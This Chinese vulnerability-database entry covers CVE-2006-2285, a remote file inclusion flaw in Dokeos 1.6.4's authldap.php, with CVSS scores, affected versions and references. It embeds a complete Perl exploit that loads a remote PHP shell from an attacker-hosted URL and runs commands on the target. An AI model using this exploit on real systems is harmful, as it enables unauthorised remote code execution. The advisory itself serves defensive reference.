CVE-2006-2285
CVSS5.1
发布时间 :2006-05-09 22:14:00
修订时间 :2011-03-07 21:35:52
NMCOE    

[原文]PHP remote file inclusion vulnerability in authldap.php in Dokeos 1.6.4 allows remote attackers to execute arbitrary PHP code via a URL in the includePath parameter.


[CNNVD]Dokeos authldap.php PHP远程文件包含漏洞(CNNVD-200605-140)

        Dokeos 1.6.4 的authldap.php存在PHP远程文件包含漏洞,远程攻击者可以通过includePath参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.5.5
cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.6_rc2
cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.4
cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.5
cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.5.3
cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.5.4
cpe:/a:dokeos:open_source_learning_and_knowledge_management_tool:1.6.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2285
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2285
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-140
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/19980
(VENDOR_ADVISORY)  SECUNIA  19980
http://www.vupen.com/english/advisories/2006/1680
(UNKNOWN)  VUPEN  ADV-2006-1680
http://www.securityfocus.com/bid/17873
(UNKNOWN)  BID  17873
http://www.securityfocus.com/archive/1/archive/1/433247/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060508 Dokeos Learning Management System 1.6.4 Remote File Include
http://xforce.iss.net/xforce/xfdb/26274
(UNKNOWN)  XF  dokeos-authldap-file-include(26274)
http://www.securityfocus.com/bid/17915
(UNKNOWN)  BID  17915
http://www.osvdb.org/25437
(UNKNOWN)  OSVDB  25437
http://securitytracker.com/id?1016089
(UNKNOWN)  SECTRACK  1016089
http://securityreason.com/securityalert/856
(UNKNOWN)  SREASON  856

- 漏洞信息

Dokeos authldap.php PHP远程文件包含漏洞
中危 输入验证
2006-05-09 00:00:00 2006-05-10 00:00:00
远程  
        Dokeos 1.6.4 的authldap.php存在PHP远程文件包含漏洞,远程攻击者可以通过includePath参数中的URL执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1765)

Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit (EDBID:1765)
php webapps
2006-05-08 Verified
0 beford
N/A [点击下载]
#!/usr/bin/perl
############
# Dokeos Learning Management System 1.6.4 Remote File Include
# Exploit & Advisorie:  beford <xbefordx gmail com>
#
# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
# 		perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
#
# cmd shell example: <? system($cmd); ?>
# cmd variable: cmd;
#
#############
# Description
#############
# Vendor: http://www.dokeos.com/
# The file dokeos/claroline/auth/ldap/authldap.php uses the variable 
# includePath in a include() function without being declared. 
# This issue has already been fixed in current claroline.net version, 
# but dokeos still uses a  vulnerable version.
############
# Vulnerable code
############
# include ("$includePath/../auth/ldap/ldap_var.inc.php");
############
use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
head();
while() {
	print "[shell] \$";
	while(<STDIN>)      {
		$cmd=$_;
		chomp($cmd);
		if (!$cmd) {last;}  
		$xpl = LWP::UserAgent->new() or die;
		$req = HTTP::Request->new(GET =>$Path.'claroline/auth/ldap/authldap.php?includePath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
		$res = $xpl->request($req);
		$return = $res->content;
		$return =~ tr/[\n]/[ê]/;
		if ($return =~/Error: HTTP request failed!/ ) {
			print "\nInvalid path for phpshell\n";
			exit;
		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
			print "\nInvalid Command, error.\n\n";
		}
		if ($return =~ /(.*)/) {
			$finreturn = $1;
			$finreturn=~ tr/[ê]/[\n]/;
			print "\r\n$finreturn\n\r";
			last;
		} else {
			print "[shell] \$";
		}
	}
} last;

sub head()  { 
	print "\n============================================================================\r\n";
	print "  Dokeos Learning Management System Remote File Include\r\n";
	print "============================================================================\r\n";
 }
 
sub usage() {
	head();
	print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
	print " <host> - Full Path : http://host/dokeos/ \r\n";
	print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
	print " <var> - var name used in phpshell : cmd  \r\n\r\n";
	exit();
 }

# milw0rm.com [2006-05-08]
		

- 漏洞信息

25437
Dokeos authldap.php includePath Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Dokeos contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to authldap.php not properly sanitizing user input supplied to the 'includePath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-08 Unknow
2006-05-08 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站